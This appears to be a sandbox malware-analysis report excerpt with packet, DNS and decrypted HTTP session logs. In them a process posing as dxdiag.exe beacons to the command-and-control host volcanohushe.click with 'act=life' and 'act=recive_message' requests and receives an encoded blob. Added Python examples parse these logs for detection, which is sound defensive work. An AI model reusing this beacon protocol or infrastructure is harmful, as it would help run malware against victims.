                                                                                                      Dec 23, 2024 01:22:22.132688046 CET49712443192.168.2.8104.21.71.155
                                                                                                      Dec 23, 2024 01:22:22.132805109 CET49712443192.168.2.8104.21.71.155
                                                                                                      Dec 23, 2024 01:22:22.132824898 CET44349712104.21.71.155192.168.2.8
                                                                                                      Dec 23, 2024 01:22:22.605139017 CET49713443192.168.2.8104.21.71.155
                                                                                                      Dec 23, 2024 01:22:22.605197906 CET44349713104.21.71.155192.168.2.8
                                                                                                      Dec 23, 2024 01:22:22.605274916 CET49713443192.168.2.8104.21.71.155
                                                                                                      Dec 23, 2024 01:22:22.605590105 CET49713443192.168.2.8104.21.71.155
                                                                                                      Dec 23, 2024 01:22:22.605606079 CET44349713104.21.71.155192.168.2.8
                                                                                                      Dec 23, 2024 01:22:23.820775986 CET44349713104.21.71.155192.168.2.8
                                                                                                      Dec 23, 2024 01:22:23.820879936 CET49713443192.168.2.8104.21.71.155
                                                                                                      Dec 23, 2024 01:22:23.822276115 CET49713443192.168.2.8104.21.71.155
                                                                                                      Dec 23, 2024 01:22:23.822293043 CET44349713104.21.71.155192.168.2.8
                                                                                                      Dec 23, 2024 01:22:23.822544098 CET44349713104.21.71.155192.168.2.8
                                                                                                      Dec 23, 2024 01:22:23.842402935 CET49713443192.168.2.8104.21.71.155
                                                                                                      Dec 23, 2024 01:22:23.843194008 CET49713443192.168.2.8104.21.71.155
                                                                                                      Dec 23, 2024 01:22:23.843238115 CET44349713104.21.71.155192.168.2.8
                                                                                                      Dec 23, 2024 01:22:23.843355894 CET49713443192.168.2.8104.21.71.155
                                                                                                      Dec 23, 2024 01:22:23.843389988 CET44349713104.21.71.155192.168.2.8
                                                                                                      Dec 23, 2024 01:22:23.843779087 CET49713443192.168.2.8104.21.71.155
                                                                                                      Dec 23, 2024 01:22:23.843825102 CET44349713104.21.71.155192.168.2.8
                                                                                                      Dec 23, 2024 01:22:23.844002008 CET49713443192.168.2.8104.21.71.155
                                                                                                      Dec 23, 2024 01:22:23.844042063 CET44349713104.21.71.155192.168.2.8
                                                                                                      Dec 23, 2024 01:22:23.844189882 CET49713443192.168.2.8104.21.71.155
                                                                                                      Dec 23, 2024 01:22:23.844229937 CET44349713104.21.71.155192.168.2.8
                                                                                                      Dec 23, 2024 01:22:23.844369888 CET49713443192.168.2.8104.21.71.155
                                                                                                      Dec 23, 2024 01:22:23.844398975 CET44349713104.21.71.155192.168.2.8
                                                                                                      Dec 23, 2024 01:22:23.844407082 CET49713443192.168.2.8104.21.71.155
                                                                                                      Dec 23, 2024 01:22:23.844427109 CET44349713104.21.71.155192.168.2.8
                                                                                                      Dec 23, 2024 01:22:23.844538927 CET49713443192.168.2.8104.21.71.155
                                                                                                      Dec 23, 2024 01:22:23.844563961 CET44349713104.21.71.155192.168.2.8
                                                                                                      Dec 23, 2024 01:22:23.844583035 CET49713443192.168.2.8104.21.71.155
                                                                                                      Dec 23, 2024 01:22:23.844696999 CET49713443192.168.2.8104.21.71.155
                                                                                                      Dec 23, 2024 01:22:23.844728947 CET49713443192.168.2.8104.21.71.155
                                                                                                      Dec 23, 2024 01:22:23.891345978 CET44349713104.21.71.155192.168.2.8
                                                                                                      Dec 23, 2024 01:22:23.891947985 CET49713443192.168.2.8104.21.71.155
                                                                                                      Dec 23, 2024 01:22:23.891994953 CET44349713104.21.71.155192.168.2.8
                                                                                                      Dec 23, 2024 01:22:23.892015934 CET49713443192.168.2.8104.21.71.155
                                                                                                      Dec 23, 2024 01:22:23.892035007 CET44349713104.21.71.155192.168.2.8
                                                                                                      Dec 23, 2024 01:22:23.892055035 CET49713443192.168.2.8104.21.71.155
                                                                                                      Dec 23, 2024 01:22:23.892066956 CET44349713104.21.71.155192.168.2.8
                                                                                                      Dec 23, 2024 01:22:23.892117977 CET49713443192.168.2.8104.21.71.155
                                                                                                      Dec 23, 2024 01:22:23.892131090 CET44349713104.21.71.155192.168.2.8
                                                                                                      Dec 23, 2024 01:22:26.304934025 CET44349713104.21.71.155192.168.2.8
                                                                                                      Dec 23, 2024 01:22:26.305187941 CET44349713104.21.71.155192.168.2.8
                                                                                                      Dec 23, 2024 01:22:26.305248976 CET49713443192.168.2.8104.21.71.155
                                                                                                      Dec 23, 2024 01:22:26.305393934 CET49713443192.168.2.8104.21.71.155
                                                                                                      Dec 23, 2024 01:22:26.305412054 CET44349713104.21.71.155192.168.2.8
                                                                                                      Dec 23, 2024 01:22:26.359004974 CET49714443192.168.2.8104.21.71.155
                                                                                                      Dec 23, 2024 01:22:26.359050989 CET44349714104.21.71.155192.168.2.8
                                                                                                      Dec 23, 2024 01:22:26.359138966 CET49714443192.168.2.8104.21.71.155
                                                                                                      Dec 23, 2024 01:22:26.359428883 CET49714443192.168.2.8104.21.71.155
                                                                                                      Dec 23, 2024 01:22:26.359438896 CET44349714104.21.71.155192.168.2.8
                                                                                                      Dec 23, 2024 01:22:27.362380028 CET49714443192.168.2.8104.21.71.155
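Exported as plain text, the packet table's port and address columns are concatenated without separators (e.g. 44349709104.21.71.155192.168.2.8), and that string has several valid readings: 443|49709, 4434|9709 and 44349|709 are all legal port pairs. The parser below is an added example for this page, not part of the Joe Sandbox report. It enumerates every reading and keeps the single one consistent with two facts the report itself states, the sandbox address 192.168.2.8 and the server port 443, then folds the rows into per-connection flow summaries (packets per direction, first/last packet, duration). The sample rows are copied from the table above (the tail of port 49709 and all of port 49714).

```python
"""Rebuild per-connection flow summaries from a Joe Sandbox packet table whose
columns were concatenated on export. Added example; not part of the report.
Known facts taken from the report: sandbox IP 192.168.2.8, server port 443."""
import re
from datetime import datetime

# Rows copied verbatim from the packet table above (port 49709 tail, port 49714 whole).
SAMPLE_ROWS = [
    "Dec 23, 2024 01:22:17.095073938 CET44349709104.21.71.155192.168.2.8",
    "Dec 23, 2024 01:22:17.095141888 CET49709443192.168.2.8104.21.71.155",
    "Dec 23, 2024 01:22:17.095429897 CET49709443192.168.2.8104.21.71.155",
    "Dec 23, 2024 01:22:17.095451117 CET44349709104.21.71.155192.168.2.8",
    "Dec 23, 2024 01:22:26.359004974 CET49714443192.168.2.8104.21.71.155",
    "Dec 23, 2024 01:22:26.359050989 CET44349714104.21.71.155192.168.2.8",
    "Dec 23, 2024 01:22:26.359138966 CET49714443192.168.2.8104.21.71.155",
    "Dec 23, 2024 01:22:26.359428883 CET49714443192.168.2.8104.21.71.155",
    "Dec 23, 2024 01:22:26.359438896 CET44349714104.21.71.155192.168.2.8",
    "Dec 23, 2024 01:22:27.362380028 CET49714443192.168.2.8104.21.71.155",
]

# Timestamp (nanosecond fraction), zone abbreviation, then the concatenated columns.
ROW_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2} \d{1,2}, \d{4} \d{2}:\d{2}:\d{2})\.(?P<ns>\d{9}) "
    r"(?P<tz>[A-Z]{3,4})(?P<fields>\S+)$"
)
EPOCH = datetime(1970, 1, 1)


def _is_octet(s):
    # Reject leading zeros: "04" is not a valid dotted-quad octet, which prunes many false splits.
    return s.isdigit() and (s == "0" or s[0] != "0") and int(s) <= 255


def _is_ip(s):
    parts = s.split(".")
    return len(parts) == 4 and all(_is_octet(p) for p in parts)


def _is_port(s):
    return s.isdigit() and s[0] != "0" and int(s) <= 65535


def candidate_splits(fields):
    """Every (src_port, dst_port, src_ip, dst_ip) reading of the concatenated columns."""
    out = []
    for k in range(2, len(fields)):           # k: where the address section starts
        ips = fields[k:]
        for q in range(7, len(ips) - 6):      # q: boundary between the two addresses
            ip1, ip2 = ips[:q], ips[q:]
            if not (_is_ip(ip1) and _is_ip(ip2)):
                continue
            ports = fields[:k]
            for p in range(1, len(ports)):    # p: boundary between the two ports
                if _is_port(ports[:p]) and _is_port(ports[p:]):
                    out.append((int(ports[:p]), int(ports[p:]), ip1, ip2))
    return out


def parse_row(row, sandbox_ip, server_port):
    """Parse one row, resolving the column ambiguity with the known sandbox IP and server port."""
    m = ROW_RE.match(row.strip())
    if not m:
        raise ValueError(f"unrecognised row: {row!r}")
    dt = datetime.strptime(m["ts"], "%b %d, %Y %H:%M:%S")
    t_ns = int((dt - EPOCH).total_seconds()) * 10**9 + int(m["ns"])  # integer ns, no float drift
    readings = [
        c for c in candidate_splits(m["fields"])
        if (c[2] == sandbox_ip and c[1] == server_port and c[3] != sandbox_ip)
        or (c[3] == sandbox_ip and c[0] == server_port and c[2] != sandbox_ip)
    ]
    if len(readings) != 1:
        raise ValueError(f"{len(readings)} consistent readings for {row!r}")
    sp, dp, sip, dip = readings[0]
    return {"t_ns": t_ns, "tz": m["tz"], "src_port": sp, "dst_port": dp,
            "src_ip": sip, "dst_ip": dip, "to_server": sip == sandbox_ip}


def summarize(rows, sandbox_ip, server_port):
    """Group packets by client ephemeral port and count direction, span and duration."""
    flows = {}
    for row in rows:
        p = parse_row(row, sandbox_ip, server_port)
        cport = p["src_port"] if p["to_server"] else p["dst_port"]
        f = flows.setdefault(cport, {"packets": 0, "to_server": 0, "from_server": 0,
                                     "first_ns": p["t_ns"], "last_ns": p["t_ns"]})
        f["packets"] += 1
        f["to_server" if p["to_server"] else "from_server"] += 1
        f["first_ns"] = min(f["first_ns"], p["t_ns"])
        f["last_ns"] = max(f["last_ns"], p["t_ns"])
    for f in flows.values():
        f["duration_s"] = (f["last_ns"] - f["first_ns"]) / 1e9
    return flows


if __name__ == "__main__":
    for port, f in sorted(summarize(SAMPLE_ROWS, "192.168.2.8", 443).items()):
        print(f"client port {port}: {f['packets']} pkts "
              f"({f['to_server']} out / {f['from_server']} in), {f['duration_s']:.3f} s")
```

Without the two anchoring facts the row is genuinely ambiguous, so the parser refuses rather than guesses; on a table from a different sandbox, pass that sandbox's client address and the service port shown in its session table.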
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 23, 2024 01:22:07.442678928 CET | 58813 | 53 | 192.168.2.8 | 1.1.1.1
Dec 23, 2024 01:22:07.781054020 CET | 53 | 58813 | 1.1.1.1 | 192.168.2.8
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 23, 2024 01:22:07.442678928 CET | 192.168.2.8 | 1.1.1.1 | 0x711f | Standard query (0) | volcanohushe.click | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 23, 2024 01:22:07.781054020 CET | 1.1.1.1 | 192.168.2.8 | 0x711f | No error (0) | volcanohushe.click | | 104.21.71.155 | A (IP address) | IN (0x0001) | false
Dec 23, 2024 01:22:07.781054020 CET | 1.1.1.1 | 192.168.2.8 | 0x711f | No error (0) | volcanohushe.click | | 172.67.145.201 | A (IP address) | IN (0x0001) | false
• volcanohushe.click
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.8 | 49706 | 104.21.71.155 | 443 | 7524 | C:\Windows\SysWOW64\dxdiag.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-23 00:22:09 UTC | 265 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: volcanohushe.click
2024-12-23 00:22:09 UTC | 8 | OUT | Data Raw: 61 63 74 3d 6c 69 66 65
Data Ascii: act=life
2024-12-23 00:22:09 UTC | 1137 | IN | HTTP/1.1 200 OK
Date: Mon, 23 Dec 2024 00:22:09 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=3n6g4huuqkp3lq4grfiqeg2j76; expires=Thu, 17 Apr 2025 18:08:48 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Iuclp0z%2B%2Fa8dSKe%2F2nPxWyQHlI%2F4MdNXoU1wnrXJxmqS%2F%2BlsvNZZ%2BeGis6xWrB1Q7MKaYDiPlwbgs0E6g33rt%2Fgy7QofCUHiW3cVn5GjtvxAKiHFgP9bTGnsDrDvH5BckF1CbfI%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f6432145e3372b7-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1818&min_rtt=1810&rtt_var=695&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2844&recv_bytes=909&delivery_rate=1554845&cwnd=192&unsent_bytes=0&cid=e59d1be93a4dff44&ts=895&x=0"
2024-12-23 00:22:09 UTC | 7 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a
Data Ascii: 2ok
2024-12-23 00:22:09 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0
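The two sessions above are one C2 exchange: a short form POST to /api carrying act=life, answered with a chunked "ok", followed by act=recive_message&ver=4.0&lid=...&j= answered with a large chunked body (its first chunk-size line is 491c, i.e. 18716 bytes, delivered in 1369-byte fragments). The code below is an added example for this page, not part of the Joe Sandbox report: it rebuilds the request from the printed header text and "Data Raw" hex, de-chunks the response the way a sensor or proxy log parser would, and labels the traits visible in this transcript. The label strings are this example's own names for what the capture shows, not a published signature; nothing is claimed about the contents of the encoded blob.

```python
"""Decode the HTTP session transcripts above and flag the C2 traits they show.
Added example for this page; not part of the Joe Sandbox report. Inputs are
copied from the transcript: request header lines as text, bodies as hex."""
from urllib.parse import parse_qs

SESSION0_REQUEST_HEAD = (
    "POST /api HTTP/1.1\r\n"
    "Connection: Keep-Alive\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
    "(KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36\r\n"
    "Content-Length: 8\r\n"
    "Host: volcanohushe.click\r\n"
)
SESSION0_REQUEST_BODY_HEX = "61 63 74 3d 6c 69 66 65"
SESSION0_RESPONSE_CHUNKS_HEX = ["32 0d 0a 6f 6b 0d 0a", "30 0d 0a 0d 0a"]

# Session 1 uses the same headers apart from Content-Length: 52; its response
# fragment begins with the chunk-size line "491c\r\n". Only its first ten bytes
# are embedded here, to exercise the truncated-capture path.
SESSION1_REQUEST_HEAD = SESSION0_REQUEST_HEAD.replace("Content-Length: 8", "Content-Length: 52")
SESSION1_REQUEST_BODY_HEX = (
    "61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 "
    "26 6c 69 64 3d 70 71 5a 6e 4b 50 2d 2d 5a 6e 56 6a 61 32 6c 75 5a 31 26 6a 3d"
)
SESSION1_RESPONSE_FIRST_BYTES_HEX = "34 39 31 63 0d 0a 57 55 68 6c"


def raw_to_bytes(fragments):
    """Join the 'Data Raw' hex fragments of one direction into a byte string."""
    return b"".join(bytes.fromhex(f) for f in fragments)


def first_chunk_size(body):
    """Declared size of the first chunk, or None if the size line is incomplete."""
    eol = body.find(b"\r\n")
    return int(body[:eol].split(b";")[0], 16) if eol > 0 else None


def dechunk(body):
    """Decode Transfer-Encoding: chunked. Returns (payload, complete); a capture
    cut off mid-chunk yields the bytes seen so far with complete=False."""
    out, pos = bytearray(), 0
    while True:
        eol = body.find(b"\r\n", pos)
        if eol < 0:
            return bytes(out), False
        size = int(body[pos:eol].split(b";")[0], 16)   # drop any chunk extension
        pos = eol + 2
        if size == 0:
            return bytes(out), True                     # last-chunk; trailers ignored
        chunk = body[pos:pos + size]
        out += chunk
        if len(chunk) < size or body[pos + size:pos + size + 2] != b"\r\n":
            return bytes(out), False
        pos += size + 2


def parse_request(head, body):
    """Split request line and headers; decode a form-urlencoded body into a dict."""
    lines = head.strip().splitlines()
    method, path, version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    form = {}
    if headers.get("content-type", "").startswith("application/x-www-form-urlencoded"):
        pairs = parse_qs(body.decode("latin-1"), keep_blank_values=True)
        form = {k: v[0] for k, v in pairs.items()}
    declared = headers.get("content-length")
    return {"method": method, "path": path, "version": version, "headers": headers,
            "form": form, "body_len": len(body),
            "length_ok": declared is None or int(declared) == len(body)}


def classify(req):
    """Labels for the traits this transcript shows (example's own names, not a signature)."""
    hits = []
    form = req["form"]
    if req["method"] == "POST" and req["path"] == "/api" and form:
        hits.append("form POST to /api")
    if form.get("act") == "life":
        hits.append("act=life keepalive")
    if form.get("act") == "recive_message" and {"ver", "lid", "j"}.issubset(form):
        hits.append("act=recive_message with ver/lid/j")
    ua = req["headers"].get("user-agent", "")
    if "Chrome/119.0.0.0" in ua and "Windows NT 10.0; Win64; x64" in ua:
        hits.append("fixed Chrome/119 Win64 User-Agent")
    return hits


if __name__ == "__main__":
    for head, body_hex in ((SESSION0_REQUEST_HEAD, SESSION0_REQUEST_BODY_HEX),
                           (SESSION1_REQUEST_HEAD, SESSION1_REQUEST_BODY_HEX)):
        req = parse_request(head, raw_to_bytes([body_hex]))
        print(req["form"], "->", classify(req))
    print(dechunk(raw_to_bytes(SESSION0_RESPONSE_CHUNKS_HEX)))
```

Two caveats for anyone turning this into detection. The packet table shows these sessions on TCP/443, so the cleartext above is what the sandbox recovered from inside TLS; a passive sensor on the wire sees only the handshake, which makes the DNS lookup for volcanohushe.click (and the TLS SNI, if present) the network-visible hook, not the form body. And both resolved addresses answer with Server: cloudflare, so blocking 104.21.71.155 or 172.67.145.201 blocks shared edge infrastructure; act on the hostname.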


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.8 | 49707 | 104.21.71.155 | 443 | 7524 | C:\Windows\SysWOW64\dxdiag.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-23 00:22:11 UTC | 266 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 52
Host: volcanohushe.click
2024-12-23 00:22:11 UTC | 52 | OUT | Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 70 71 5a 6e 4b 50 2d 2d 5a 6e 56 6a 61 32 6c 75 5a 31 26 6a 3d
Data Ascii: act=recive_message&ver=4.0&lid=pqZnKP--ZnVja2luZ1&j=
2024-12-23 00:22:11 UTC | 1127 | IN | HTTP/1.1 200 OK
Date: Mon, 23 Dec 2024 00:22:11 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=9ucpjfg0qsunu2c9dccr2lcp62; expires=Thu, 17 Apr 2025 18:08:50 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=g8lG5WF6oFQ6Btlaltk4blwayDhHPa5JCh8tCeuGN%2BMYuX25cr4PePrEAZy%2BFeXSwe1Ll7%2FFf1JnvXJUBhaus1PJKzAgpsaBbvOegsmpV5VCQxK7vN1vbXAkxAnGut8T6JNJqBg%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f643221bd02f5f4-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1588&min_rtt=1577&rtt_var=613&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2844&recv_bytes=954&delivery_rate=1753753&cwnd=103&unsent_bytes=0&cid=450407429eb242ee&ts=762&x=0"
2024-12-23 00:22:11 UTC | 242 | IN | Data Raw: 34 39 31 63 0d 0a 57 55 68 6c 4a 45 63 71 44 73 6a 51 57 38 6d 64 46 63 53 6c 66 4d 37 32 66 30 6e 32 34 66 65 55 44 65 6a 75 37 45 58 78 41 6d 55 69 61 68 4d 47 66 52 34 69 36 71 4d 2b 36 36 64 68 74 74 41 5a 34 74 51 65 4c 64 54 62 6b 66 56 68 6d 34 76 41 5a 34 64 76 52 32 4d 75 42 45 67 30 54 79 4c 71 74 53 50 72 70 30 36 2f 68 78 6d 67 31 45 56 72 6b 34 75 56 39 57 47 4b 6a 34 63 71 67 57 34 47 4d 53 51 43 54 43 4a 4a 61 71 6d 38 4e 71 7a 34 63 4b 58 50 45 71 65 62 46 79 54 55 7a 64 58 78 64 38 72 55 7a 67 69 55 64 67 51 55 4b 52 5a 50 5a 56 63 69 73 2f 49 2b 70 37 38 76 35 73 51 5a 72 4a 6f 5a 4c 5a 32 4a 6e 2f 78 70 69 34 71 47 4e 5a 68 6b 44 54 45 71 41 55 30 6f 51 48 36 6b 74 6a 47 6e 2f 6e 71 6c 68 31 44 73
Data Ascii: 491cWUhlJEcqDsjQW8mdFcSlfM72f0n24feUDeju7EXxAmUiahMGfR4i6qM+66dhttAZ4tQeLdTbkfVhm4vAZ4dvR2MuBEg0TyLqtSPrp06/hxmg1EVrk4uV9WGKj4cqgW4GMSQCTCJJaqm8Nqz4cKXPEqebFyTUzdXxd8rUzgiUdgQUKRZPZVcis/I+p78v5sQZrJoZLZ2Jn/xpi4qGNZhkDTEqAU0oQH6ktjGn/nqlh1Ds
2024-12-23 00:22:11 UTC | 1369 | IN | Data Raw: 6b 77 56 72 7a 4d 50 47 78 47 79 62 6e 5a 73 71 67 32 5a 48 4a 47 51 65 42 69 4a 45 4c 50 4c 79 4d 61 66 78 63 71 58 49 47 61 32 55 44 79 53 55 67 4a 33 2b 61 34 43 44 67 53 69 64 61 67 41 7a 49 77 42 4a 49 6b 42 71 70 62 46 35 35 62 39 77 76 6f 64 47 37 4c 51 4e 4b 4a 65 58 6d 4f 63 76 6c 63 4b 58 5a 35 52 73 52 32 4e 71 41 55 67 6b 52 57 79 34 75 6a 4b 67 2b 6d 57 74 7a 68 4f 68 6c 42 41 68 6d 34 43 56 38 57 57 41 67 34 51 6a 6e 6d 30 42 4f 79 70 48 43 47 56 50 64 4f 72 71 65 59 6a 36 5a 36 48 4c 43 4f 36 75 58 54 54 61 6d 74 58 78 59 38 72 55 7a 69 2b 57 59 77 51 77 4a 51 52 4f 4c 6c 70 73 75 4c 51 30 72 75 31 78 6f 38 6b 55 72 34 59 58 4a 5a 4b 41 6e 50 31 6d 6a 34 75 4b 5a 39 30 67 41 43 4e 71 58 77 59 45 52 57 65 6d 75 43 36 72 76 32 6a 6f 33 6c 36
Data Ascii: kwVrzMPGxGybnZsqg2ZHJGQeBiJELPLyMafxcqXIGa2UDySUgJ3+a4CDgSidagAzIwBJIkBqpbF55b9wvodG7LQNKJeXmOcvlcKXZ5RsR2NqAUgkRWy4ujKg+mWtzhOhlBAhm4CV8WWAg4Qjnm0BOypHCGVPdOrqeYj6Z6HLCO6uXTTamtXxY8rUzi+WYwQwJQROLlpsuLQ0ru1xo8kUr4YXJZKAnP1mj4uKZ90gACNqXwYERWemuC6rv2jo3l6
2024-12-23 00:22:11 UTC | 1369 | IN | Data Raw: 5a 4b 4d 6d 50 6f 76 78 4d 79 4a 50 39 4d 34 52 78 45 70 45 30 55 76 43 6c 6d 70 76 44 65 73 36 54 65 35 69 51 66 73 6b 78 46 72 7a 4d 4f 59 39 32 65 4d 6e 6f 45 71 6b 47 34 4a 4e 43 38 49 54 69 56 49 59 61 2b 32 4d 71 44 38 65 71 4c 56 46 4b 79 63 47 43 71 65 69 64 57 34 4c 34 32 55 7a 6e 2f 54 55 52 41 77 61 44 4a 46 4b 30 5a 72 76 50 49 6d 35 65 59 33 6f 63 74 65 39 4e 51 51 49 35 47 47 6d 76 64 6c 68 49 6d 45 4b 35 74 75 42 43 6b 6c 41 30 59 70 51 47 61 6e 76 44 32 6a 39 6e 79 74 77 52 36 74 6e 6c 31 6c 31 49 53 4e 74 6a 66 4b 75 49 6b 72 6e 6d 39 46 44 69 6b 4a 53 43 4a 65 4c 4c 58 38 49 4f 76 34 65 2b 61 66 58 71 43 64 48 53 43 65 68 35 58 78 59 6f 2b 50 69 53 53 65 5a 77 30 31 4c 51 4e 4b 4c 45 56 71 71 72 55 39 72 75 31 79 72 38 73 53 37 4e 70 64
Data Ascii: ZKMmPovxMyJP9M4RxEpE0UvClmpvDes6Te5iQfskxFrzMOY92eMnoEqkG4JNC8ITiVIYa+2MqD8eqLVFKycGCqeidW4L42Uzn/TURAwaDJFK0ZrvPIm5eY3octe9NQQI5GGmvdlhImEK5tuBCklA0YpQGanvD2j9nytwR6tnl1l1ISNtjfKuIkrnm9FDikJSCJeLLX8IOv4e+afXqCdHSCeh5XxYo+PiSSeZw01LQNKLEVqqrU9ru1yr8sS7Npd
2024-12-23 00:22:11 UTC | 1369 | IN | Data Raw: 76 76 4c 34 32 41 7a 6e 2f 54 61 51 34 70 4a 41 6c 50 4b 45 35 6b 72 62 77 30 6f 50 6c 38 6f 63 41 59 6f 5a 77 51 4c 70 65 43 6b 66 78 39 69 59 65 45 4b 70 6b 67 53 58 73 74 48 77 5a 39 43 45 75 6d 6d 79 6d 77 37 57 48 6d 32 46 43 31 31 42 6f 6e 31 4e 76 56 39 57 43 44 67 34 59 76 6e 47 38 44 4e 53 77 42 53 79 42 48 5a 72 69 36 4e 36 62 30 65 4b 33 56 48 71 47 51 45 53 2b 63 69 4a 2b 32 49 63 71 4c 6c 6d 66 4c 49 44 49 32 4a 51 64 46 4d 77 68 7a 35 4b 74 35 72 50 4d 33 2f 6f 63 53 6f 70 51 53 4a 35 69 49 6e 66 64 6a 68 49 75 4c 4c 70 74 6f 46 54 6f 75 44 30 63 72 52 32 32 75 74 7a 79 76 2b 48 4f 67 79 46 37 69 31 42 6f 7a 31 4e 76 56 32 55 69 2f 7a 71 38 64 30 33 39 4a 49 6d 6f 41 53 6d 55 51 4c 4b 61 78 4e 61 50 77 63 61 2f 4c 46 4b 57 66 45 53 43 51 6a
Data Ascii: vvL42Azn/TaQ4pJAlPKE5krbw0oPl8ocAYoZwQLpeCkfx9iYeEKpkgSXstHwZ9CEummymw7WHm2FC11Bon1NvV9WCDg4YvnG8DNSwBSyBHZri6N6b0eK3VHqGQES+ciJ+2IcqLlmfLIDI2JQdFMwhz5Kt5rPM3/ocSopQSJ5iInfdjhIuLLptoFTouD0crR22utzyv+HOgyF7i1Boz1NvV2Ui/zq8d039JImoASmUQLKaxNaPwca/LFKWfESCQj
2024-12-23 00:22:11 UTC | 1369 | IN | Data Raw: 46 6a 59 38 68 67 57 63 4f 4b 53 51 4b 53 53 31 41 5a 61 75 32 50 4b 62 35 65 36 7a 47 47 61 4b 61 46 57 76 61 77 35 4c 75 4c 39 4c 4d 72 7a 65 49 63 68 45 32 43 77 70 4a 5a 56 63 69 73 2f 49 2b 70 37 38 76 35 73 34 4d 71 4a 6b 50 49 70 4f 4e 6d 76 56 39 69 34 47 46 4e 5a 52 76 41 7a 77 6d 41 55 6b 6a 53 57 6d 67 76 6a 36 75 39 48 69 71 68 31 44 73 6b 77 56 72 7a 4d 4f 37 2f 58 79 64 6a 34 41 73 68 58 74 48 4a 47 51 65 42 69 4a 45 4c 50 4c 79 4f 71 44 30 63 36 62 4c 48 71 69 5a 48 54 6d 62 68 4a 4c 2f 5a 4a 69 47 69 53 43 59 61 41 77 30 4c 42 56 4b 4b 31 70 70 75 4b 42 35 35 62 39 77 76 6f 64 47 37 4b 49 61 4f 34 53 41 31 38 64 35 69 5a 71 46 4b 70 38 67 47 48 55 7a 52 30 45 70 43 44 54 71 74 44 61 69 2f 48 69 6e 7a 68 4b 68 6b 52 51 75 6c 59 57 52 2f 47
Data Ascii: FjY8hgWcOKSQKSS1AZau2PKb5e6zGGaKaFWvaw5LuL9LMrzeIchE2CwpJZVcis/I+p78v5s4MqJkPIpONmvV9i4GFNZRvAzwmAUkjSWmgvj6u9Hiqh1DskwVrzMO7/Xydj4AshXtHJGQeBiJELPLyOqD0c6bLHqiZHTmbhJL/ZJiGiSCYaAw0LBVKK1ppuKB55b9wvodG7KIaO4SA18d5iZqFKp8gGHUzR0EpCDTqtDai/HinzhKhkRQulYWR/G
